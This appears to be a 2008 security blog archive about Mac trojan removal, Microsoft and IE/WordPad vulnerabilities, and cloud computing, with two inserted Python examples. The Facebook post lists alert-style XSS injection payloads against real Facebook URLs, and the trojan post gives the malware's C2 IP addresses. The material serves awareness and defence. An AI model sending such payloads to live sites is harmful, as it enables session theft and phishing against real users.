Archive for December, 2008

How To Remove “MacAccess” Trojan

Due to infection reports and the prevalence of this threat, here are removal instructions for the “MacAccess” trojan.

The presence of the following files indicates that the infection or installation of this tricky trojan succeeded.

[Screenshot: installed_files]

/cron.inst
/i386
/Library/Internet Plug-Ins/AdobeFlash
/Library/Internet Plug-Ins/Mozillaplug.plugin

Please take note that the files /cron.inst and /i386 may not exist, since they usually get deleted after the trojan has successfully executed its code.

To fix the infection, simply delete any of these files.

Also, this trojan creates a cron (scheduling) job (/cron.inst) that executes a malicious Perl script named “AdobeFlash” found in “/Library/Internet Plug-Ins/”, so it is important that you check this part through Terminal. Execute “sudo crontab -l” to list the scheduled job, as shown below:

***Thanks for all the feedback! To all readers: use sudo so that a normal user can run crontab commands as root***

The cron job executes every five minutes, which triggers the backdoor to check the remote IP address. It has been observed to check for these remote IP addresses:

94.247.2.109
78.157.142.187


To remove it, simply execute “sudo crontab -r” and double check by executing “sudo crontab -l”, as shown below:

[Screenshot: remove]

Take note: You have to open Terminal to run “crontab”. Terminal is located at ~/Applications/Utilities, or you can simply search for it using Spotlight as shown below:

[Screenshot: Terminal]

OSX/Jahlav aka “MacAccess” will attempt to connect to the mentioned IP addresses (this may vary depending on the variant), which may install another trojan, often DNSChanger. So it is best to check your DNS settings and look for dodgy entries such as IPs starting with 85.xx.xx.xx. To fix this, simply remove them and restore your legitimate DNS settings. Please check this instruction to help you fix malicious DNS entries.
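The checks above, as an added example that is not part of the original post: it looks for the indicator files listed earlier and flags any root crontab entry that runs the AdobeFlash script, which is the job the post says to remove with “sudo crontab -r”. The sample crontab is constructed, not a real capture.

```python
import os
import re
import subprocess

# Indicator files from the post, relative to the volume root.
INDICATOR_FILES = [
    "cron.inst",
    "i386",
    "Library/Internet Plug-Ins/AdobeFlash",
    "Library/Internet Plug-Ins/Mozillaplug.plugin",
]

# Matches the AdobeFlash path with a plain or backslash-escaped space in "Internet Plug-Ins".
ADOBEFLASH_RE = re.compile(r"Internet\\? Plug-Ins/AdobeFlash")


def find_indicator_files(root="/", exists=os.path.exists):
    """Return the indicator paths present under root (exists is injectable for testing)."""
    return [p for p in INDICATOR_FILES if exists(os.path.join(root, p))]


def suspicious_cron_entries(crontab_text):
    """Return (schedule, command) for every non-comment line that runs the AdobeFlash script."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) == 6 and ADOBEFLASH_RE.search(fields[5]):
            hits.append((" ".join(fields[:5]), fields[5]))
    return hits


def root_crontab():
    """Read root's crontab via sudo, as the post does; '' if none is installed or sudo is missing."""
    try:
        r = subprocess.run(["sudo", "crontab", "-l"], capture_output=True, text=True)
    except FileNotFoundError:
        return ""
    return r.stdout if r.returncode == 0 else ""


# Constructed sample of an infected root crontab; the post says the job fires every five minutes.
SAMPLE_CRONTAB = """# root crontab
*/5 * * * * /Library/Internet\\ Plug-Ins/AdobeFlash >/dev/null 2>&1
0 3 * * * /usr/bin/periodic daily
"""

if __name__ == "__main__":
    for p in find_indicator_files():
        print("indicator present: /" + p)
    for schedule, cmd in suspicious_cron_entries(root_crontab()):
        print(f"suspicious cron job ({schedule}): {cmd} -> remove with: sudo crontab -r")
```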

If these instructions work, I’ll be excited to hear your story. I’m sure any info will also help other OS X users.

If not, please feel free to drop a message, hopefully with additional information such as:

  • How did you get infected? (website?)
  • Do you still have a copy of the application you installed? If yes, please send it to this email address: meths101 (at) optusnet (dot) com (dot) au, or just send me a link where I can download it.
  • Any unusual behavior found on your computer.

Updated 5/22/2009:

– Added information about Terminal as per request.

Updated 6/10/2009:

– Added link to How To Check Your DNS Settings

MS “Out-of Band” Security Update

This is an advance notification of an out-of-band security bulletin that Microsoft is intending to release on December 17, 2008.

The full version of the Microsoft Security Bulletin Advance Notification for December 2008 can be found at http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx.

This resolves a newly discovered vulnerability, the critical IE7 flaw.

Critical Facebook XSS

The Facebook worm aka “Koobface” is exploiting a highly critical XSS vulnerability, as recently discovered. It seems these guys have successfully messed around in Facebook, as it has been around for months now.

Further Reading xssed.com

XSS #1 with POST (by Zeitjak)

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton)

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmmm nice PoC to play around.
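The two injection shapes quoted above (an attribute break-out in #1, a tag break-out in #2), reflected into a form field with and without HTML escaping, as an added illustration that is not part of the original post or of xssed.com. The POST bodies are constructed to match the decoded shape of those entries; the rendering code is a hypothetical echo of a submitted value, not Facebook’s.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed POST bodies with the same decoded shape as entries #1 and #2 above:
# #1 closes the value attribute and adds an event handler, #2 closes the tag and adds an element.
POST_BODY_ATTR = "reg_email__=%22onmouseover%3D%22alert%28%27XSS%27%29%22foo%3D%22bar"
POST_BODY_TAG = "email=biz%22%3E%3Cscript%3Ealert%28%27x%27%29%3C%2Fscript%3E%3C%22&pass=p"


class TagCollector(HTMLParser):
    """Records (tag, sorted attribute names) the way a browser-like parser sees the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, sorted(name for name, _ in attrs)))


def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def render_field(field, value, escape):
    """Echo a submitted value back into the form; escape=False is the vulnerable pattern."""
    shown = html.escape(value, quote=True) if escape else value
    return f'<input type="text" name="{field}" value="{shown}">'


def reflect(post_body, field, escape):
    """Pull `field` out of a urlencoded POST body and re-render it, as an error page might."""
    value = parse_qs(post_body, keep_blank_values=True).get(field, [""])[0]
    return render_field(field, value, escape)


EXPECTED = [("input", ["name", "type", "value"])]


def is_contained(markup):
    """True when the only tag is our <input> with exactly the intended attributes."""
    return parsed_tags(markup) == EXPECTED


if __name__ == "__main__":
    for body, field in ((POST_BODY_ATTR, "reg_email__"), (POST_BODY_TAG, "email")):
        for escape in (False, True):
            out = reflect(body, field, escape)
            print(f"escape={escape}: contained={is_contained(out)} tags={parsed_tags(out)}")
```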

You and Cloud Computing

Cloud computing is a new currency in information technology. It is becoming an accepted architecture through which people access their applications, data and information from any web-connected device. Although there are a lot of critics and debatable issues behind this emerging trend, most internet users still appreciate its benefits.

One version of cloud computing is Apple MobileMe, which allows you to sync data and access it from different web-connected devices such as the iPhone, iPod, Mac and PC.

Another example of cloud computing is social networking websites such as LinkedIn, which has started to embrace and introduce data-sharing applications such as WordPress, Google Presentation, Blog Link and more; this allows users like me to share data and collaborate with their peers.

Amazon Web Services (AWS) provides cloud services on a scalable and inexpensive computing platform.

Google Apps provides a service that lets users enjoy Google Calendar, Picasa (stores pictures), YouTube (holds videos), Gmail and Google Docs (documents, spreadsheets and presentations).

Windows Live SkyDrive allows users to upload their files to the computing cloud and then access them from a web browser. [Read Wiki] It is currently in Beta, and users get 25 GB of storage for free! It also ties in Windows Live Photos, Favorite Web Links, Windows Live Spaces (blog, photos, lists, profile, gadgets, contact card integration with MSN Messenger and Hotmail) and RSS feeds.

We are now surrounded by clouds: cloud storage, services, software and applications. This emerging architecture is becoming popular and accepted, as the PEW research report says: “Cloud computing takes hold as 69% of all internet users have either stored data online or used a web-based software application” [PEW Cloud Computing data memo]

From an information security perspective, the CIA model of cloud computing still raises questions about how far we can trust cloud providers on Confidentiality (preventing unwanted disclosure), Integrity (preventing unwanted modification) and Availability (making sure it is available when needed). Do you think this is an option for the enterprise?

On the other hand, I’m thinking about threats such as attacks and infections: will cloud computing be able to provide a solution to the dramatic increase in malware and threats? Do you think it can lessen them and make it a safer platform for everyone?

IE & WordPad Zero Day In-The-Wild

IE XML Parsing Remote Buffer OverFlow Exploit [Read Shadowserver Diary]

As many of you have seen, there is a new 0-day exploit in the wild affecting Internet Explorer 7 users. This is a new exploit that is being actively exploited and it was not patched yesterday (meaning there is no patch available, yet). Visiting a website with this exploit can result in a full compromise of an affected system. Currently most of the exploits out there will attempt to download a trojan onto the system.

Recommendation: Do NOT use IE until a patch is available.

Reference: ISC Diary ;  SecmaniacBlog

PoC: 7403 ; 7410

oooOOooo

Microsoft Security Advisory (960906): Vulnerability in WordPad Text Converter Could Allow Remote Code Execution 

Recommendation: Do not use WordPad to open files with .doc, .wri, or .rtf extensions that you receive from untrusted sources or receive unexpectedly from trusted sources. This vulnerability could be exploited when using WordPad to open a specially crafted file. We also recommend customers using Windows XP to upgrade to Windows XP Service Pack 3, which is not affected. 

Affected Systems:

  • Microsoft Windows 2000 Service Pack 4
  • Windows XP Service Pack 2
  • Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
  • Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2
  • Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2

Reference: MS Advisory ; CVE-2008-4841 ; Secunia Advisories ; Security Focus

PoC: 6560 ; 31399


OSX/Jahlav evading scanners detection

A new OSX/Jahlav variant shows a little trick to evade AV (security scanner) detection.

[Screenshot: preinstall3]

The same trick is used for the next script …

[Screenshot: preinstall_drop3]

So it stops here, since the last decoded script remains the same except for the IP address value.

Unfortunately, these changes affect the container as well, which is the DMG file. Overall, we are not seeing a significant change here, although it is obvious the author wants to maximize infection.

Apple removes Mac antivirus warning [CNet News]

Interesting to read, as published in ZDNet Australia:

Apple has removed an old item from its support site late Tuesday in the US that urged Mac customers to use multiple antivirus utilities and this week said the Mac is safe “out of the box”. 

Are you sure? Just search around the net and you’ll find a bunch of Mac users who got infected with DNSChanger aka “RSPlug”. And today I received a new sample (still under analysis), but Intego has already published an awareness note. [Read Here] It’s funny that the author named its malicious script “intego”, as shown in the code as “begin 666 intego”.